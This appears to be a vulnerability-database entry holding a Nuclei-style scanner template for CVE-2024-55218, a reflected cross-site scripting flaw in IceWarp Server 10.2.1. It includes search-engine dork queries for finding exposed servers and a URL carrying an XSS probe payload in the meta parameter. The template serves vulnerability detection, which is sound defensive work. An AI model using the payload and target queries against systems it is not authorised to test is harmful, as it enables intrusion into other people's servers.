| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2024-55218 | 7 Jan 202519:57 | – | circl | |
| IceWarp Server 跨站脚本漏洞 | 7 Jan 202500:00 | – | cnnvd | |
| CVE-2024-55218 | 7 Jan 202500:00 | – | cve | |
| CVE-2024-55218 | 7 Jan 202500:00 | – | cvelist | |
| EUVD-2024-52754 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-55218 | 7 Jan 202520:15 | – | nvd | |
| CVE-2024-55218 | 7 Jan 202520:15 | – | osv | |
| CVE-2024-55218 | 23 May 202506:58 | – | redhatcve | |
| CVE-2024-55218 | 7 Jan 202500:00 | – | vulnrichment |
id: CVE-2024-55218
info:
name: IceWarp Server 10.2.1 - Cross-Site Scripting
author: s4e-io
severity: medium
description: |
IceWarp Server 10.2.1 is vulnerable to Cross Site Scripting (XSS) via the meta parameter.
impact: |
Attackers can inject malicious JavaScript through the meta parameter, executing arbitrary code in victim browsers when they visit crafted URLs.
remediation: |
Update IceWarp Server to a version later than 10.2.1 that addresses the reflected XSS vulnerability.
reference:
- https://resources.s4e.io/blog/icewarp-server-10-2-1-reflected-xss-vulnerability-cve-2024-55218/
- https://nvd.nist.gov/vuln/detail/CVE-2024-55218
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-55218
cwe-id: CWE-79
epss-score: 0.00673
epss-percentile: 0.47668
metadata:
verified: true
max-request: 1
vendor: icewarp
product: mail_server
shodan-query:
- http.title:"icewarp server administration"
- http.title:"icewarp"
- cpe:"cpe:2.3:a:icewarp:mail_server"
fofa-query:
- title="icewarp server administration"
- title="icewarp"
google-query:
- intitle:"icewarp server administration"
- intitle:"icewarp"
- powered by icewarp 10.2.1
- powered by icewarp 10.4.4
tags: cve,cve2024,icewarp,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/?meta=%3Csvg%2Fonload=confirm%28document.domain%29%3E"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "<svg/onload=confirm(document.domain)>", "IceWarp")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100daa4a4b3aa3939f335b144fd378c8ac1df7956ebb0f628bfb2ffa21155b5711402200347fe7d358eb4511da88763e17ffed89657496b0dbfae3a00f33b811ab4c65f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation